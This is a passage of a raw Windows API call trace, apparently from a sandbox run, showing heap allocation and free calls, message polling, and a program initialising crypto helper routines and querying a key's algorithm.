out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da248 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889430 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.803] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0035.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.804] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.804] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0035.804] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.805] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.805] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.805] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.806] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.806] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.806] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0035.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.806] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0035.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0035.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0035.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0035.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0035.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.810] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da358, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da358*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.810] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.811] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.811] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.811] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.811] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.811] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.811] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.811] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.811] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.811] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.811] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.811] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.811] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0035.811] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.811] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.811] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.812] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.812] 